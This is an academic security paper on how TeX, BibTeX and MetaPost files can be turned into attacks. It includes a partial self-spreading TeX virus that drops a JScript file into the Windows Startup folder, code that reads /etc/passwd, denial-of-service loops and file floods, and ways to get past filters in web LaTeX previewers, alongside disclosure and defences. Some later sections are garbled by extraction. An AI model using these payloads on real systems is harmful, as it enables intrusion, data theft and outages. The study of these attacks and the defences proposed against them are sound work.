
Are Text-Only Data Formats Safe? Or, Use This LaTeX Class File to Pwn Your Computer

Stephen Checkoway (UC San Diego), Hovav Shacham (UC San Diego), Eric Rescorla (RTFM, Inc.)

Abstract

We show that malicious TeX, BibTeX, and MetaPost files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration, through the file I/O capabilities exposed by TeX’s Turing-complete macro language. This calls into doubt the conventional wisdom that text-only data formats that do not access the network are likely safe. We build a TeX virus that spreads between documents on the MiKTeX distribution on Windows XP; we demonstrate data exfiltration attacks on web-based LaTeX previewer services.

1 Introduction

The divide between “code” and “data” is among the most fundamental in computing. Code expresses behavior or functionality to be carried out by a computer; data encodes and describes an object (a photo, a spreadsheet, etc.) that is conceptually inert, and examined or manipulated by means of appropriate code. The complexity of data formats for media manipulated by desktop systems, together with the inability of programmers to write bug-free code, has generated a stream of exploits in common media formats. These exploits take advantage of software bugs to induce arbitrary behavior when a user views a data file, even seemingly simple ones such as Windows’ animated cursors [16]. The inclusion of powerful scripting languages in file formats like Microsoft’s Word has led to so-called macro viruses (see footnote 1), and to PostScript documents that violate a paper reviewer’s anonymity [3]. These two trends have combined in the use of PDF files that include JavaScript to exploit bugs in Adobe’s Acrobat; by one report [19], some 80% of exploits in the fourth quarter of 2009 used malicious PDF files. Thus the complexity and opacity of data formats have made data behave more like code. On the other side, a line of work culminating in the English-language shellcode of Mason et al. [13] has shown how to make code look more like data.

Footnote 1: Amusingly, some advocacy documents list “no macro viruses” as an advantage TeX has over Word; see, e.g., http://web.mit.edu/klund/www/urk/texvword.html.

In this paper, we present a case study of another unsafe data format, one that is of particular interest to the academic community: TeX. Unlike Word documents or PDF files, the input file formats associated with TeX are all plain text and thus, naïvely, “safe.” LaTeX and BibTeX files are routinely transmitted in research environments, a practice we show is fundamentally unsafe. Compiling a document with standard TeX distributions allows total system compromise on Windows and information leakage on UNIX.

TeX is unsafe. Knuth’s TeX is the standard typesetting system for mathematical documents. It is also a Turing-complete macro language used to interpret scripts from potentially untrusted sources. In this paper, we show that a specific capability exposed to TeX macros, the ability to read and write arbitrary files, makes it (and other commonly used bits of TeXware, such as BibTeX and MetaPost) a threat to system security and data privacy.

We demonstrate two concrete attacks. First, as an example of running arbitrary programs, we build a TeX virus that affects recent MiKTeX distributions on Windows XP, spreading to all of a user’s TeX documents. The virus requires no user action beyond compiling an infected file. Our virus does nothing but infect other documents, but it could download and execute binaries or undertake any other action it wishes.

Second, we describe data exfiltration and denial of service attacks against web-based LaTeX and MetaPost previewer services. Our findings have implications for any online service that compiles or hosts TeX files on behalf of untrusted users, including the Comprehensive TeX Archive Network (CTAN) and Cornell University Library’s arXiv.org preprint server.

Defenses. The lesson we teach here is one learned over and over: As the Internet has made document sharing easier and more pervasive, file formats once considered trusted have become attack vectors, either because the parser was insecure or because the scripting capabilities exposed to files in the format have unforeseen consequences. Barring a fundamental change in the way that data-handling code is designed and implemented, we must set aside the idea that data, unlike code, can be “safe”; we should instead treat data-processing code as inherently insecure and design systems that can withstand its compromise, as, for example, Bernstein has advocated [5].

For TeX specifically, there are three main approaches to protect against abuse of interpreted languages. First,

one could audit the interpreter for vulnerabilities that allow the attacker to subvert the intended restrictions on the scripting language. Such vulnerabilities are commonly found in supposedly safe file formats and frequently allow the attacker to execute arbitrary code, as in Dowd’s recent ActionScript exploit [8]. We know of no such vulnerabilities in TeX, but their absence does nothing to defend against capabilities granted to TeX scripts by design, including the file I/O that forms the basis for our attacks. A second approach is to attempt to establish a safe subset of commands, through blacklisting, whitelisting, or other forms of filtering or rewriting. (This is akin to code-rewriting systems in which code is verified safe at load-time [17].) As we show below, the malleability of the TeX language makes it difficult to filter safely. A final, more drastic approach is to treat the entire system as untrusted and sandbox it using the operating system’s isolation mechanisms; as we show, this seems like the most promising approach for TeX.

Observations similar to the ones we have made for TeX apply to other data formats that are programmable (e.g., using JavaScript) or require complicated and error-prone parsers. Ensuring that all programs that process such formats are appropriately sandboxed represents a reimagination of the way traditional desktop environments are engineered; a redesigned system would dovetail with the principles laid out by Bernstein [5].

2 Low-level details of TeX

In this section, we recall some features of the TeX programming language and the LaTeX macro package. The discussion covers only the behaviors on which our attack relies; for more complete coverage we refer the reader to [6, 11, 24]. Even so, the discussion is quite technical. Readers not interested in TeX arcana are encouraged to continue to Section 3, referring back to this section for reference as necessary.

Important control sequences. TeX and LaTeX behavior is principally controlled by a variety of control sequences, conventionally a sequence of characters prefaced by a backslash (\). Below are some of the control sequences we will use in the remainder of the paper.

    \catcode  TeX primitive that changes the category code of a character: \catcode`\X=0 changes the default category code of X from “letter” to “escape character.”
    \csname ... \endcsname  TeX primitive that builds control sequences: \csname foo\endcsname is (almost) the same as \foo.
    \include  LaTeX macro that behaves as \input except that the included material begins on a new page: \include{file}.
    \input  TeX primitive (redefined by LaTeX) that reads the contents of its space-separated argument as if the text were typed directly into the main document: \input file (or in LaTeX, \input{file}).
    \@input  LaTeX internal similar to TeX’s \input.
    \@@input  LaTeX internal identical to TeX’s \input.
    \jobname  TeX primitive that expands to the name of the file being compiled without its extension.
    \newread  (La)TeX macro to allocate a new stream for file reading: \newread\file.
    \openin  TeX primitive that opens a file and associates it with a read stream: \openin\file=foo.ext.
    \read  TeX primitive that reads a line from a file, assigning each character the category code currently in effect: \read\file to\line stores the tokens produced from the file into \line.
    \readline  ε-TeX extension that behaves as \read but assigns only the category codes “other” and “space.”
    \relax  TeX primitive that takes no action; just relaxes.
    \write  TeX primitive that writes an expanded token list to a file: \write\file{foo}.

Other control sequences are used below, but either their behavior is clear or their use is not of central importance.

TeX parsing behavior. TeX’s behavior is usually described in terms of a “mouth” and a “stomach.” The exact behavior is fairly complex but the following simplified description will suffice for this paper. TeX’s mouth reads each line of input character by character and produces a stream of tokens which are acted on by TeX’s stomach. There are two types of tokens produced by TeX’s mouth, character tokens and control sequences, and their production is governed by the category code (an integer in 0–15) of the characters read. At any given time, each input character is associated with a single category code. Except in certain situations, expandable tokens (e.g., macros) are expanded into other tokens en route to TeX’s stomach. Once in the stomach, TeX processes the tokens, performing assignments (such as changing category codes) and typesetting.

When TeX encounters two identical character tokens with category code 7 (by default only ^), followed by two lowercase hexadecimal digits, it treats the four characters as if a single character whose ASCII value is that hexadecimal number had appeared in the input. For example, ^^5c is read as a backslash.

3 Malicious TeX usage

It is generally assumed that it is safe to process arbitrary, untrusted documents with TeX, and by extension LaTeX. However, this is untrue; in fact, TeX can write arbitrary files to the filesystem. On UNIX systems, TeX output is typically restricted to the local directory and its subdirectories, which limits the scope of attack somewhat. However, MiKTeX, the most common TeX distribution for Windows, has no internal controls on where output can be written.

This ability to write to any file presents an obvious danger in that important files can be overwritten or the computing environment can be changed by the introduction of new files. The average user’s computer is a target-rich environment, with any number of files which, when modified, allow the attacker to execute code in the user’s environment. For concreteness, we focus on a single case: on Windows XP we can write JScript files to a user’s Startup directory which will be executed by the Windows Script Host facility at login.

Once the script is executed, one possibility is it could download and run a binary of the attacker’s choice using the Microsoft.XMLHTTP object. For example, this could cause the computer to become part of a botnet.

There is one technical hurdle that must be overcome in order to write to the Startup directory, namely spaces in the file path, which TeX does not ordinarily allow. However, we can leverage Windows’ compatibility with older programs that expect file and directory names in 8.3 format. For example, Start Menu can be specified as STARTM~1. We use this compatibility in our proof-of-concept for application execution, a LaTeX virus.

3.1 A two-stage virus

The virus attacks in two phases. In the first phase, it copies the payload to disk and installs the appropriate JScript file into Startup. In the second phase, the JScript file finds other LaTeX documents on the disk and infects them.

The first phase takes advantage of the fact that the TeX engine used in MiKTeX (and indeed in all modern TeX distributions) is pdfTeX, which contains the ε-TeX extension \readline [23]. First, \readline is used to read the document being compiled line by line and write an exact copy to C:\WINDOWS\Temp\sploit.tmp. Then, a JScript file containing the second phase of the virus is written to the Administrator’s Startup directory. Since the exact details of how this is accomplished are rather technical, they are omitted; however, the code for the first phase is given in Listing 1.

The second phase, written in JScript, first creates a FileSystemObject, then reads the sploit.tmp file and extracts all of the TeX code between two marker lines (the virus code). Next, it finds all of the files in the Administrator directory with the extension .tex. Finally, those files which contain \end{document} have the virus inserted just before the end.

In total, the virus requires two marker lines and 21 80-column lines of TeX. The TeX code is given in Listing 1; in the interest of not providing a complete, working virus, the majority of the JScript is omitted, but the remaining code is straightforward and we have tested it on our own systems. Moreover, it should be clear that we could in principle execute any JScript code and do far more damage than just modifying LaTeX files on disk.

An earlier proof-of-concept TeX virus for NetBSD was designed in 1994 by Keith McMillan [15]. McMillan’s virus modifies a user’s GNU Emacs initialization file (something no longer possible with Web2C-based TeX distributions) and relies on the user’s visiting a directory in Emacs to spread to other TeX files in that directory. By contrast, our virus works on modern Windows systems and requires no user interaction beyond an eventual relogin.

3.2 BibTeX databases

One potential barrier to using TeX for application execution is that the user might notice any malicious code present in files he is editing. BibTeX databases provide a two-fold solution by (1) moving the malicious code out of the main document so it is less noticeable; and (2) allowing the code to be widely distributed.

BibTeX is a program used to turn a database of references (the .bib files) into LaTeX code for a bibliography consisting of the references for the citations in the paper (the .bbl files). Subsequent runs of LaTeX cause the text of the generated .bbl files to be \input into the document at the specified location. It is quite common for users to simply download BibTeX entries or even entire databases, such as the RFC BibTeX files provided by Miguel Garcia Martin. In the latter case, the database often contains a large number of entries which the user does not carefully examine; indeed he may never even look at the entries but rather search the database with a tool such as RefTeX. This facilitates an attack since malicious code may be harder to notice in a large file full of unused information.

Each BibTeX entry has the form @type{...}, where type is one of the types understood by a particular style such as book or article. There is an additional entry type, @preamble, which inserts text verbatim into the .bbl file just before the bibliography. In addition, multiple @preamble entries are concatenated into a single line in the order they appear in the database. Thus, malicious code can be separated into arbitrarily many parts and scattered (in order) throughout the .bib file, and will be executed regardless of which entries the author actually cites.

Other file formats that embed TeX commands can also be used as attack vectors. Examples include graphics languages such as MetaPost and Asymptote.

3.3 Class and style files

Base LaTeX functionality is extended through the use of class files, which set the overall format of the document to be produced, and style files, which typically change the behavior of one aspect of the document.

Listing 1: Virus code with JScript omitted.

    %%%%SPLOIT%%%%
    {\newwrite\w\let\c\catcode\c`*13\def*{\afterassignment\d\count255"}\def\d{% \expandafter\c\the\count255=12}{*0D\def\a#1^^M{\immediate\write\w{#1}}\c`^^M5% \newread\r\openin\r=\jobname \immediate\openout\w=C:/WINDOWS/Temp/sploit.tmp \loop\unless\ifeof\r\readline\r to\l\expandafter\a\l\repeat\immediate\closeout \w\closein\r}{*7E*24*25*26*7B*7D\immediate\openout \w=C:/DOCUME~1/ADMINI~1/STARTM~1/PROGRAMS/STARTUP/sploit.js \c`[1\c`]2\c`\@0 \newlinechar`\^^J\endlinechar-1*5C@immediate@write @w[fso=new ActiveXObject("Scripting.FileSystemObject");foo=^^J ⟨11 lines of JScript omitted⟩ f(fso.GetFolder("C:\\Documents and Settings\\Administrator"));}m();] @immediate@closeout@w]}%
    %%%%SPLOIT%%%%

CTAN currently has 1080 user-contributed LaTeX 2ε packages. The MiKTeX repository on CTAN has 1908 packages. Similar to the situation with large BibTeX databases, most users never examine a style or class file. If a popular package on one of the many CTAN mirrors were modified to contain malicious code, it might affect a large number of LaTeX users before being discovered.

Rather than corrupting an existing package, an attacker could submit a package to CTAN, e.g., one purporting to implement the guidelines for submission to a conference. Anyone using such a package would be at risk.

4 Web-based LaTeX previewers

We now turn our attention to a slightly harder target. There are more than a dozen web-based services that compile LaTeX files on users’ behalf and return the resulting PDFs. We have designed successful exfiltration and file writing attacks on most of these services. Moreover, the filtering mechanisms devised by these services were largely ineffective against our attacks. We have disclosed the vulnerabilities we found to the operators of the affected services, with universally positive responses. As a result, a number of operators changed their security policy or removed the previewer altogether.

4.1 Reading files

All properly configured web servers allow only a subset of the files on the computer to be visible to connecting clients. In this section, we show how we can use the power of TeX to read files from web servers that expose a LaTeX interface.

There are various ways that an attacker can use the exposed LaTeX interface to read files not exposed by the web server. The two most obvious approaches are using \input or \include to interpolate the text of the file into the TeX input and hence the output document. One minor problem with this approach is that we have lost line breaks in the input file since TeX will treat them as spaces in the usual manner. One way to avoid losing line breaks, as well as circumventing blacklisting of such control sequences, is to use TeX’s ability to read files. The basic idea is to open a file for reading, read it one line at a time, and feed it to the typesetting engine. The code for this is given in Listing 2.

Listing 2: Reading a file a line at a time.

    \openin5=/etc/passwd
    \def\readfile{%
      \read5 to\curline
      \ifeof5 \let\next=\relax
      \else \curline~\\
            \let\next=\readfile
      \fi
      \next}%
    \ifeof5 Couldn't read the file!%
    \else \readfile \closein5
    \fi

An additional problem is processing characters in the input that TeX considers to be special. For example, running the code in Listing 2 on one of the authors’ computers produces the error “You can’t use ‘macro parameter character #’ in horizontal mode.” This is easily fixed by changing the category code for # with \catcode`\#=12 before the \read command in Listing 2 and restoring it afterward. Other special characters can be handled in an analogous manner. Alternatively, the \readline primitive from ε-TeX can be used.

4.2 Writing files

As discussed in Section 3, Web2C-based TeX distributions such as teTeX and TeX Live typically only allow files to be output in the current directory or a subdirectory. However, this still leaves room for attacks. A common way to generate images for displaying in a web page is to make a temporary directory (for example in /tmp) and generate the needed files inside that directory. Afterward, the images are copied elsewhere or used immediately and then the whole directory is deleted. A previewer that generates images in a web-accessible directory and then cleans up only the specific files it knows will be generated but not needed may be vulnerable to attack. For example, on a web server that allows PHP, an attacker need only open a file using \openout and use \write

to write PHP code, which would then be executed by the server when the attacker did an HTTP request for that file. If the previewer is based on MiKTeX, these constraints are relaxed and the attack is even easier.

4.3 Denial of service

Any previewer that allows the TeX looping construct \loop ... \repeat or the definition of new macros is at risk of a denial of service attack. The shortest form of this attack is \loop\iftrue\repeat. Another way to achieve this is to use \def\nothing{\nothing}. The loops cause TeX to burn CPU cycles without actually producing anything. If enough instances run at once, the computer will slow to a crawl and no more useful work will be possible until the processes are killed.

One extension of this attack is to cause TeX to produce very large files, potentially filling up the disk. The way to do this without exhausting TeX’s memory is to produce pages of output so that TeX will discard from its memory the pages it has already processed. This can be done using \shipout, a TeX primitive that writes the contents of the following box to the output file.

4.4 Escaping math mode

Many of the LaTeX previewers on the web were designed only to display mathematics. As a result, the text that the user inputs is copied into a mathematics environment in an otherwise-complete LaTeX document to pass off to LaTeX for compilation. The most common way to do this is to put the input inside an eqnarray* or align* environment. To get out of math mode, we simply start the input with \end{eqnarray*} (resp. \end{align*}) and to ensure that the document compiles, we end the input with \begin{eqnarray*} (resp. \begin{align*}). Alternatively, to get out of math mode temporarily, we can use \parbox.

4.5 Evading Filters

The natural defense against the attacks described in this section is to filter out dangerous commands. However, this is more difficult than it first appears. In this section, we describe a number of techniques for evading simple filters. For concreteness, the discussion below is limited to \input, but most of the techniques are applicable to all the commands discussed above.

Using some of the features and control sequences described in Section 2, we can use \input without having to write the literal string \input. For example, we can use \csname input\endcsname. This attack is more likely to succeed than \input because \csname is used mostly by package writers and only rarely by authors.

An attacker can evade simpleminded filters by using \catcode to change the category code of another character to “escape” and use that in place of \. For example, one can change the category code of ‘X’ and use Xinput. Additionally, one can use ^^5c in place of \ as described in Section 2. Of course, characters other than \ could be replaced as well: for example, if the word “input” is not allowed anywhere in the previewer’s input, then ‘p’ can be replaced with ^^70.

Yet another possibility is for an attacker to invoke \@input or \@@input directly; this requires using either \makeatletter or \catcode to change the category code of @ to “letter.” In all likelihood, there are a number of LaTeX internals that could be used to facilitate an attack. These are much less well known outside of the package writing community and are thus likely to escape the notice of a web site administrator attempting to secure a LaTeX previewer.

One can make use of a peculiarity of the implementation of LaTeX environments to evade filters that look for control sequences starting with \. A LaTeX environment foo consists of a pair \begin{foo} ... \end{foo}. The \begin{foo} and \end{foo} macros execute the control sequences \foo and \endfoo using \csname. Thus, one can execute any control sequence by passing its name as the argument to \begin. If \endfoo is not defined, TeX defines it as \relax. For example, \begin{TeX}\end{TeX} eventually executes \TeX\relax. Since the backslash before the control sequence name is not present when using \begin, it does not trigger a filter looking for particular control sequences which begin with \. One can pass arguments to a macro simply by placing the argument after the \begin. For example, one can read files with \begin{input}{/file/path}\end{input}.

4.6 MetaPost

MetaPost is a declarative, macro programming language, based on Metafont, used to produce vector graphics, often for inclusion into (La)TeX documents. Like TeX, MetaPost is an extremely powerful language and as such, there are dangers associated with providing a MetaPost previewer on the web.

The first such danger is the ability to write arbitrary single line TeX fragments. Any literal text that appears between btex and etex is written to a tex file which is compiled by TeX and the result is included into the MetaPost output; this is often used for typesetting labels. MetaPost provides a way to include arbitrary, multi-line TeX code at the beginning of the tex file used with btex...etex using the verbatimtex...etex construct. The latexMP package makes using LaTeX for typesetting easy. It includes a macro textext which takes a string argument containing a single line of LaTeX to typeset. As a result, all of the attacks discussed thus far work just as well for a MetaPost previewer that allows the btex...etex construction or allows the use of the latexMP package.
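Returning to the filter evasion techniques of Section 4.5, a previewer operator can check how a substring filter behaves on the alternative spellings listed there. The following Python sketch is illustrative only and makes several assumptions: the blacklist, the helper names naive_filter_rejects and decode_caret_hex, and the path /file/path are hypothetical stand-ins, not code from any of the previewers we examined. The decoder is a simplified single-pass model of the ^^ notation from Section 2 and assumes category codes have not been changed.

```python
import re

# Hypothetical blacklist of the kind a simple previewer might use (an assumption).
BLACKLIST = ("\\input", "\\include")


def naive_filter_rejects(source: str) -> bool:
    """Return True if the source contains a blacklisted literal string."""
    return any(name in source for name in BLACKLIST)


def decode_caret_hex(source: str) -> str:
    """Replace ^^hh (two lowercase hex digits) with the character it denotes.

    Simplified model: a single pass, assuming ^ still has category code 7,
    and ignoring the other ^^ forms such as ^^M.
    """
    return re.sub(r"\^\^([0-9a-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), source)


# Alternative spellings of \input taken from Section 4.5.
EVASIONS = {
    "csname": r"\csname input\endcsname{/file/path}",
    "caret": r"^^5cinput{/file/path}",
    "begin": r"\begin{input}{/file/path}\end{input}",
    "catcode": r"\catcode`\X=0 Xinput{/file/path}",
}

if __name__ == "__main__":
    for name, text in EVASIONS.items():
        raw = naive_filter_rejects(text)
        decoded = naive_filter_rejects(decode_caret_hex(text))
        print(f"{name:8s} rejected raw: {raw}  rejected after decoding: {decoded}")
```

Under these assumptions, none of the four spellings is rejected by the raw filter, and decoding ^^hh first catches only the ^^5c variant. This is consistent with the argument that filtering on the source text is unlikely to be sufficient by itself.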

5 Listing 3: Reading a file with METAPOST. Listing 4: Creating 4096 files per minute with META- picture p; POST. p := nullpicture; filenametemplate "%j%c%y%m%d%H%M"; forever: i := 0; string line; forever: line := readfrom "/etc/passwd"; beginfig(i); exitif line = EOF; % Add METAPOST code here p := thelabel.lrt( line, endfig; (0, ypart llcorner p) ); if i = 4095: draw p; i := 0; endfor; else: i := i + 1; Even worse, from a web site administrator’s point of fi; view, is that since latexMP allows strings and not just lit- endfor; eral data to be typeset, attempting to sanitize input to the gle infinite loop is produced to check for the presence of textext macro requires performing a data flow anal- timeouts.2 No attempts were made to write files, conse- ysis that can prove that no harmful control sequences quently those attacks are unevaluated. Table 1 contains make it into the string ultimately used as the argument. the results of the attacks. As can be seen, the majority of A second danger is that METAPOST includes com- the attacks were successful. mands for reading and writing files, readfrom and write, respectively. To read an arbitrary file such as 4.7.1 Equation previewers /etc/passwd, we can use the code in Listing 3. The first group of LATEX previewers in Table 1 [4, 7, As seen in Listing 3, METAPOST has a command 12, 14, 18, 22] are meant to display a single mathemat- forever that loops forever. In addition to forever, ical statement at a time. Many of the previewers’ au- METAPOST allows macro definitions via def which thors took precautions against several of the file reading can be used to simulate looping. As before, we can ac- attacks described in Section 4.1 by attempting to pre- tually do more than simply burn CPU cycles. We can process the input and either remove or disallow partic- try to write large files or write many files. For exam- ular portions of input with varying degrees of success. 
ple, Listing 4 will produce a maximum of 4096 files per All of them neglected to account for the TEX primitive, minute. This limit is due to METAPOST’s maximum \openin and all were potentially vulnerable to denial of numeric value being slightly under 4096. service attacks via infinite loops using either \loop or One final avenue of attack against a METAPOST pre- \def. viewer is to use the scantokens command. It takes a 4.7.2 Full document previewers string argument and reads the string as if the contents had been written literally in the file at that point, with a few The second group of LATEX previewers in Table 1 [1, 9, exceptions. In particular, any of the attacks listed here 20, 21, 26, 27] are meant to display a complete LATEX could be created using string operations and then passed document. By their very nature, full document preview- to scantokens. ers must be permissive if they are to be useful. Full doc- ument previewers are potentially vulnerable to all of the 4.7 Evaluation same vulnerabilities as the equation previewers as well as We tested the aforementioned attacks against a variety vulnerabilities that come from allowing the inclusion of packages. For example, the Listings package, designed of web sites running LATEX previewers. The previewers examined vary in the type of content they were meant to to typeset source code listings, can be used to read and accept from a single mathematical expression to an entire display text files. All of the full document previewers we evaluate except for ScribT X — which employs several LATEX document. E Since our goal was to probe but not attack these web of the defenses discussed in Section 4.8 — are vulnera- sites, file reading was restricted to files with no security ble to all of the attacks except \input. implications such as /etc/hostname on UNIX and 4.7.3 MathTran C:\WINDOWS\win.ini on Windows. 
Rather than ac- MathTran [25] was designed as a TEX previewer with tually produce multiple infinite looping instances, we test security in mind. MathTran uses Secure plain TEX, a that macros can be defined by defining benign macros us- ing \def, \gdef, etc. Looping via \loop is attempted 2Since webservers typically have timeouts of several minutes for using the code in Listing 5. If \loop is allowed, the frag- CGI — for example, Apache and IIS both default to five minutes — this infinite loop causes no real damage. However, the timeout is long ment will output “before after before.” Once it has been enough that a real attacker attempting a denial of service would simply determined which of the looping constructs work, a sin- have to create new infinite loops every few minutes.

6 \loop \def \input \@input \csname \catcode ˆˆ5c \openin \begin

LATEX Eqn. Ed. for the Internet [4] XXXXX Roger’s Online Eqn. Ed. [7] XXXXXXXXX LATEX Eqn. Ed. [12] XXXXXXXX mathURL† [14] XXXXXXXX Hamline LATEX Eqn. Ed. [18] XXXXXXXXX MathBin.net [22] XXXXXXXX ‡ ScribTEX [1] XX LATEX Previewer [9] XXXXXXXX ScienceSoft LATEX [20] XXXXXXXX LATEXLab [21] XXXXXXXXX LATEX Online Compiler [26] XXXXXXXX Web LATEX [27] XXXXXXXXX MathTran [25]

Table 1: LATEX previewer vulnerabilities. The \loop and \def columns contain a X if the attack could be used to cause a denial of service by producing an infinite loop. The other columns contain a X if the attack can be used to read input. † The only files we were able to read were the input and the ones produced by LATEX. It is unknown if others were accessible. ‡The previewer contains a timeout of several seconds.

Listing 5: Testing for \loop.

    \newif\iffoo\footrue
    \loop before
    \iffoo after \foofalse
    \repeat

reimplementation of plain TEX that prevents using any control sequence other than those meant for typesetting. As a result, all of the attacks described above fail, with the one exception of escaping from math mode. This is the most secure web-based previewer we evaluate.

4.7.4 METAPOST

The one METAPOST previewer we evaluate [10] is vulnerable to reading and writing files using the METAPOST commands. Through the btex...etex construct, it is also vulnerable to all of the attacks that affect [9].

4.8 Defenses against attacks

As we have seen, simply filtering out macros deemed unsafe is problematic. First, the list of macros that would need to be blacklisted is quite large, especially if the user can add additional packages. For example, the LATEX 2ε kernel alone defines the macros \include, \input, \@input, \@iinput, \@input@, \@@input, and \InputIfFileExists [6]. Second, style and class files can contain additional macros for reading files, for example \lstinputlisting from the listings package or \verbatiminput from the verbatim package. The blacklisting approach seems unlikely to succeed without a complete understanding of TEX and LATEX.

Instead of blacklisting unsafe macros, we could whitelist macros deemed safe. This approach seems difficult to implement and verify successfully. For example, it would be easy to overlook the fact that ^^5c starts a new control sequence. In addition, for the previewer to be useful, the list of acceptable control sequences would be quite large. MathTran [25] takes a similar approach, except that rather than having a preprocessing step, plain TEX itself is completely reimplemented.

Rather than preprocessing the input, a better approach leverages the power of TEX to perform the input sanitization. The mathURL previewer [14] takes this approach by redefining \input and \include to be no-op macros that just expand to their own arguments. Had \@@input been redefined instead, the majority of the file reading attacks would have failed, since all of LATEX's input macros rely on \@@input. Similar to blacklisting, this approach requires deciding on a set of disallowed macros and then redefining them; however, it does not fall prey to the ^^5c, \catcode, \csname, or \begin attacks, because those tricks still resolve to the redefined macros. As with blacklisting, it still requires knowing which control sequences to redefine.

A more promising approach for preventing TEX from reading sensitive files is to leverage TEX runtime configuration parameters. Web2C-based TEX distributions contain the runtime configuration parameter openin_any that, when set to p, for "paranoid," disallows reading any files in a parent directory. By default, this parameter is set to allow any files to be read. This relies on the particular TEX implementation correctly implementing this parameter. Unfortunately, MiKTEX does not contain a similar configuration parameter. A similar parameter for Web2C-based distributions controls writing.

A second approach (which can be used in concert with the first) is to run TEX in an operating system jail containing just the files needed for the TEX distribution. This approach has two major advantages. First, it is not sensitive to details of the TEX implementation. Second, it allows us to leverage existing work on process isolation.
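The difficulty of filtering by control sequence name can be made concrete with a short LATEX sketch. It assumes a hypothetical previewer whose filter rejects any submission containing the command name preceded by a backslash, and a hypothetical file secret.txt in the working directory; neither is taken from the previewers evaluated in this paper. Each of the three lines reaches the same file-reading macro without that text ever appearing in the source.

```latex
\documentclass{article}
\begin{document}
% secret.txt is a hypothetical file name used only for illustration.

% 1. While reading a line, TeX replaces ^^5c by the character with
%    hexadecimal code 5c (a backslash), so a control sequence starts here.
^^5cinput{secret.txt}

% 2. \csname ... \endcsname assembles the control sequence from its letters.
\csname input\endcsname{secret.txt}

% 3. Giving "!" category code 0 makes it an escape character,
%    so "!input" is read as the same control sequence.
\catcode`\!=0 !input{secret.txt}
\end{document}
```

A filter that operates on the source text has to anticipate every such spelling, whereas a redefinition of the macro itself applies regardless of how the control sequence was produced.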
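As a sketch of the configuration approach on a Web2C-based distribution, the fragment below sets the read parameter named above in the texmf.cnf configuration file. The name openout_any for the corresponding write parameter does not appear in the text above and is our assumption about which parameter is meant; the distribution's own texmf.cnf should be consulted before relying on either setting.

```
% texmf.cnf fragment for a Web2C-based distribution (illustrative sketch)

% p = "paranoid": refuse to read files in a parent directory
openin_any = p

% assumed name of the similar parameter that controls writing
openout_any = p
```

Because this protection depends on the TEX implementation honoring the parameter, it is best combined with the jail approach rather than used alone.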

We note that ScribTEX uses both the configuration and jail approaches, which is why it is impervious to all of the file reading attacks [2].

Defending against denial of service attacks only requires a timeout short enough to ensure that the server does not get overwhelmed.

5 Conclusions

Conventional wisdom in security distinguishes between "safe" and "unsafe" data files. Binary files are riskier than text files; content that interacts with the network is riskier than purely local content. In this paper, we argue that even seemingly safe data files can be unsafe. Although TEX documents are plain text, manipulating maliciously constructed LATEX documents or class files, BIBTEX databases, or METAPOST graphics files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration.

Acknowledgments

We thank Stefan Savage for numerous helpful conversations; Troy Henderson for letting us experiment extensively with his LATEX and METAPOST previewers; llll from FreeNode's # for pointing out the \begin attack; and the anonymous reviewers for their helpful comments.

References

[1] James Allen. ScribTEX. http://www.scribtex.com.
[2] James Allen. Personal communication, April 2008.
[3] Michael Backes, Markus Dürmuth, and Dominique Unruh. Information flow in the peer-reviewing process (extended abstract). In Birgit Pfitzmann and Patrick McDaniel, editors, Proceedings of IEEE Security & Privacy 2007, pages 187–191. IEEE Computer Society, May 2007.
[4] Will Bateman and Steve Mayer. LATEX equation editor for writing mathematics on the internet. http://www.codecogs.com/components/equationeditor/equationeditor.php.
[5] Daniel J. Bernstein. Some thoughts on security after ten years of qmail 1.0. In Ravi Sandhu and Jon A. Solworth, editors, Proceedings of CSAW 2007, pages 1–10. ACM Press, November 2007. Invited paper.
[6] Johannes Braams, David Carlisle, Alan Jeffrey, Leslie Lamport, Frank Mittelbach, Chris Rowley, and Rainer Schöpf. The LATEX 2ε sources, December 2005.
[7] Roger Cortesi. Roger's online equation editor. http://rogercortesi.com/eqn/index.php.
[8] Mark Dowd. Application-specific attacks: Leveraging the ActionScript virtual machine. http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf, April 2008.
[9] Troy Henderson. LATEX previewer. http://www.tlhiv.org/ltxpreview.
[10] Troy Henderson. METAPOST previewer. http://www.tlhiv.org/mppreview.
[11] Donald E. Knuth. The TEXbook. Addison-Wesley Professional, 1986.
[12] LATEX equation editor. http://www.sitmo.com/latex.
[13] Joshua Mason, Sam Small, Fabian Monrose, and Greg MacManus. English shellcode. In Somesh Jha and Angelos Keromytis, editors, Proceedings of CCS 2009, pages 524–33. ACM Press, November 2009.
[14] mathURL. http://mathurl.com.
[15] Keith Allen McMillan. A platform independent computer virus. Master's thesis, The University of Wisconsin-Milwaukee, April 1994. Online: http://vx.netlux.org/lib/vkm00.html.
[16] Microsoft. Vulnerabilities in GDI could allow remote code execution (925902). Microsoft Security Bulletin MS07-017, April 2007. Online: http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx.
[17] George C. Necula and Peter Lee. Safe kernel extensions without run-time checking. In Karin Peterson and Willy Zwaenepoel, editors, Proceedings of OSDI 1996, pages 229–43. USENIX, ACM SIGOPS, and IEEE TCOS, October 1996.
[18] Andy Rundquist. Hamline university physics department LATEX equation editor. http://www.hamline.edu/~arundquist/equationeditor.
[19] ScanSafe. Annual global threat report. Online: http://www.scansafe.com/downloads/gtr/2009_AGTR.pdf, 2009.
[20] ScienceSoft LATEX. http://sciencesoft.at/latex/?lang=en.
[21] Bobby Soares. LATEXLab. http://www.latexlab.org.
[22] Mark A. Stratman. MathBin.net. http://mathbin.net.
[23] Hàn Thế Thành, Sebastian Rahtz, Hans Hagen, Hartmut Henkel, Paweł Jackowski, and Martin Schröder. The pdfTEX user manual, January 2007.
[24] The NTS Team. The ε-TEX manual. Max-Planck-Institut für Physik, February 1998.
[25] The Open University. MathTran – Online translation of mathematical content. http://mathtran.open.ac.uk.
[26] Annett Thüring. LATEX online compiler. http://nirvana.informatik.uni-halle.de/~thuering/php/latex-online/latex.php.
[27] Web LATEX. http://dev.baywifi.com/latex.
